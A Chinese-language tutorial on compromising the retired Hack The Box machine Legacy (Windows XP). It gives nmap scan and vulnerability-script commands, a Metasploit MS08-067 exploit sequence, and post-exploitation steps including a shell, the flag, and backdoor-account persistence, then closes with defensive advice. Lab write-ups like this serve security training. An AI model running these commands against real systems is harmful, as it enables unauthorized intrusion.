HTB:Legacy 渗透测试
字数 1106 2025-08-15 21:34:01

HTB: Legacy 渗透测试教学文档

1. 靶机概述

  • 平台: Hack The Box (HTB) - 在线渗透测试平台
  • 靶机名称: Legacy
  • 状态: 已退役
  • 操作系统: Microsoft Windows XP
  • IP地址: 10.129.61.196 (注意:退役靶机的IP可能与信息卡不一致)

2. 信息收集阶段

2.1 初始扫描

使用nmap进行基本扫描:

nmap -sV -O -A 10.129.61.196

2.2 扫描结果

端口 状态 服务 版本信息
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

关键发现:

  • 开放了SMB服务(445端口)
  • 操作系统为Windows XP(已过时,可能存在已知漏洞)

3. 漏洞探测

3.1 使用nmap脚本扫描漏洞

nmap --script=vuln -p 445 10.129.61.196

选择--script=vuln参数的原因:

  • 直接查找常见漏洞
  • 比searchsploit更便于筛选所需漏洞

3.2 潜在漏洞分析

Windows XP的SMB服务可能存在的漏洞:

  • MS08-067 (NetAPI漏洞)
  • MS17-010 (永恒之蓝)
  • 其他SMB相关漏洞

4. 漏洞利用

4.1 使用Metasploit框架

  1. 启动msfconsole:
msfconsole
  1. 搜索相关漏洞模块:
search ms08-067
  1. 选择并配置攻击模块:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.129.61.196
set LHOST [你的本地IP]
  1. 执行攻击:
exploit

4.2 替代方法尝试

尝试使用MS17-010(永恒之蓝)攻击:

  • 未成功(原因可能是目标系统未受此漏洞影响或配置问题)
  • 参考链接:MS17-010分析

5. 后渗透阶段

成功利用后:

  1. 获取系统shell
  2. 查找并读取flag文件
  3. 进行权限维持(如创建后门账户等)

6. 关键学习点

  1. 老旧系统风险:Windows XP等过时系统通常存在已知漏洞
  2. SMB服务安全:SMB协议历史漏洞多,是常见攻击向量
  3. 方法论
    • 信息收集 → 漏洞探测 → 漏洞利用 → 后渗透
    • 多种攻击方法尝试(主攻失败时有备选方案)
  4. 工具使用
    • nmap的高级扫描技巧
    • Metasploit的模块化攻击流程

7. 防御建议

针对此类漏洞的防护措施:

  1. 及时更新和修补系统
  2. 关闭不必要的SMB服务
  3. 在网络边界限制SMB端口(139,445)的访问
  4. 使用入侵检测系统监控异常SMB流量

8. 参考资料

  1. HTB平台
  2. MS17-010分析文章
  3. Metasploit官方文档
  4. Nmap脚本使用指南
HTB: Legacy 渗透测试教学文档 1. 靶机概述 平台 : Hack The Box (HTB) - 在线渗透测试平台 靶机名称 : Legacy 状态 : 已退役 操作系统 : Microsoft Windows XP IP地址 : 10.129.61.196 (注意:退役靶机的IP可能与信息卡不一致) 2. 信息收集阶段 2.1 初始扫描 使用nmap进行基本扫描: 2.2 扫描结果 | 端口 | 状态 | 服务 | 版本信息 | |------|------|------|----------| | 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn | | 445/tcp | open | microsoft-ds | Microsoft Windows XP microsoft-ds | 关键发现: 开放了SMB服务(445端口) 操作系统为Windows XP(已过时,可能存在已知漏洞) 3. 漏洞探测 3.1 使用nmap脚本扫描漏洞 选择 --script=vuln 参数的原因: 直接查找常见漏洞 比searchsploit更便于筛选所需漏洞 3.2 潜在漏洞分析 Windows XP的SMB服务可能存在的漏洞: MS08-067 (NetAPI漏洞) MS17-010 (永恒之蓝) 其他SMB相关漏洞 4. 漏洞利用 4.1 使用Metasploit框架 启动msfconsole: 搜索相关漏洞模块: 选择并配置攻击模块: 执行攻击: 4.2 替代方法尝试 尝试使用MS17-010(永恒之蓝)攻击: 未成功(原因可能是目标系统未受此漏洞影响或配置问题) 参考链接: MS17-010分析 5. 后渗透阶段 成功利用后: 获取系统shell 查找并读取flag文件 进行权限维持(如创建后门账户等) 6. 关键学习点 老旧系统风险 :Windows XP等过时系统通常存在已知漏洞 SMB服务安全 :SMB协议历史漏洞多,是常见攻击向量 方法论 : 信息收集 → 漏洞探测 → 漏洞利用 → 后渗透 多种攻击方法尝试(主攻失败时有备选方案) 工具使用 : nmap的高级扫描技巧 Metasploit的模块化攻击流程 7. 防御建议 针对此类漏洞的防护措施: 及时更新和修补系统 关闭不必要的SMB服务 在网络边界限制SMB端口(139,445)的访问 使用入侵检测系统监控异常SMB流量 8. 参考资料 HTB平台 MS17-010分析文章 Metasploit官方文档 Nmap脚本使用指南